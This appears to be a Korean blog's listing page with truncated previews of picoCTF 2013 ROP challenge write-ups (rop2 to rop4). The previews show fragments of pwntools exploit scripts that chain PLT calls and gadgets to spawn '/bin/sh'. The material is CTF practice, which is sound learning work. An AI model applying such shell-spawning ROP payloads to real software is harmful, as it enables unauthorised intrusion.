Pico(3)
-
[pico CTF 2013] rop4
PICO rop4번 마지막문제입니다! ㅎㅎ 이번문제는 소스코드가없으면 풀기 어려워서 소스코드도 같이 첨부하겠습니다. 123456789101112131415161718192021222324252627282930313233343536373839#include #include #include char exec_string[20]; void exec_the_string() { execlp(exec_string, exec_string, NULL);} void call_me_with_cafebabe(int cafebabe) { if (cafebabe == 0xcafebabe) { strcpy(exec_string, "/sh"); }} void call_me_with_two_args(int deadbeef, int ..
2018.08.16 -
[pico CTF 2013] rop3
pico CTF Rop3번문제 (grin) 취약점 분석! 똑..같다 ㅎ하지만 이번에는 shell을 직접 띄어줘야한다 ㅠㅠ 저번에푼rop공룡같이 풀어본다!! 123456789101112131415161718192021222324252627282930313233from pwn import * r = process("./rop3") payload = ""read_plt = 0x08048360read_got = 0x0804a000write_plt = 0x080483a0shell = "/bin/sh"bss = 0x0804a020offset = 0x9ad60pppr = 0x804855d payload += "A"*140payload += p32(read_plt) + p32(pppr) + p32(0) + p32(bs..
2018.08.16 -
[pico CTF 2013] rop2
pico CTF 2013 ROP2번문제입니다.보호기법 체크하기! IDA로 까서 취약점을 찾아보겠습니다. 이전문제하고 똑같은 취약점이군요 ㅎㅎ쉽게 풀릴 것 같아서 not_called함수로 들어가보겠습니다. 어라... "/bin/bash"가 아니라 "/bin/data"로 바뀌어있네요.당황 ㅋㅋㅋㅋ조금더 살펴보니 system함수를 내부에서 호출하니, system함수로 ret를 주고, 인자로 "/bin/sh"를 주면 될 것 같습니다. system주소 찾고, "/bin/bash"가젯 찾고, payload 작성하면? 1234567891011121314151617181920from pwn import * r = process("./rop2")system_plt = 0x80483a0shell = 0x08048610 p..
2018.08.16